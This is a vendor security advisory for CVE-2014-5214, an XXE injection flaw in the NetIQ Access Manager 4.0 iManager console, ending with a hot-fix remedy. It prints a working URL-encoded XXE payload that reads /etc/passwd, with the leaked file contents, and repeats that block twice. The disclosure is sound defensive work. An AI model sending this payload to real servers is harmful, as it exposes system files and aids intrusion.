Environment
NetIQ Access Manager 4.0
NetIQ Access Manager 4.0 Support Pack 1 HF2 applied
CVE-2014-5214
NetIQ Access Manager 4.0 Support Pack 1 HF2 applied
CVE-2014-5214
Situation
Access Manager 4.0 setup and working fine where uses can access protected resources behind the Access Gateway after having successfully authenticated against the Identity Server. However, it is possible to execute an XML eXternal Entity Injection (XXE - see https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing for more details)
against the Access Manager Administration Console server running iManager.
As an example, the following URL demonstrates the retrieval of the /etc/passwd file as an authenticated administrative user:
https://147.2.33.233:2443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=%3C!DOCTYPE+request+[%0A%3C!ENTITY+include+SYSTEM+%22/etc/passwd%22%3E%0A]%3E%3Cquery%3E%3Ccontainer%3E%26include%3b%3C/container%3E%3Csubclasses%3Efalse%3C/subclasses%3E%3C/query%3E
The resulting message is displayed with all user specific info
Error Error: Invalid advanced selection
Container not found: at:x:25:25:
Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
:
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ncashell:x:1000:100:ncashell:/home/ncashell:/bin/bash
novlwww:x:108:113:Novell System User:/var/opt/novell/novlwww:/bin/bash
CVE-2014-5214 has been created and assigned to this discovery.
As an example, the following URL demonstrates the retrieval of the /etc/passwd file as an authenticated administrative user:
https://147.2.33.233:2443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=%3C!DOCTYPE+request+[%0A%3C!ENTITY+include+SYSTEM+%22/etc/passwd%22%3E%0A]%3E%3Cquery%3E%3Ccontainer%3E%26include%3b%3C/container%3E%3Csubclasses%3Efalse%3C/subclasses%3E%3C/query%3E
The resulting message is displayed with all user specific info
Error Error: Invalid advanced selection
Container not found: at:x:25:25:
Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
:
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ncashell:x:1000:100:ncashell:/home/ncashell:/bin/bash
novlwww:x:108:113:Novell System User:/var/opt/novell/novlwww:/bin/bash
CVE-2014-5214 has been created and assigned to this discovery.
Resolution
Apply Access Manager 4.0 Support Pack 1 Hot Fix 3 (4.0.1 HF3) or greater to address this issue.
Additional Information
NetIQ thanks Wolfgang Ettlinger (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab (https://www.sec-consult.com/) for responsibly reporting the identified issues and working with us as we addressed them.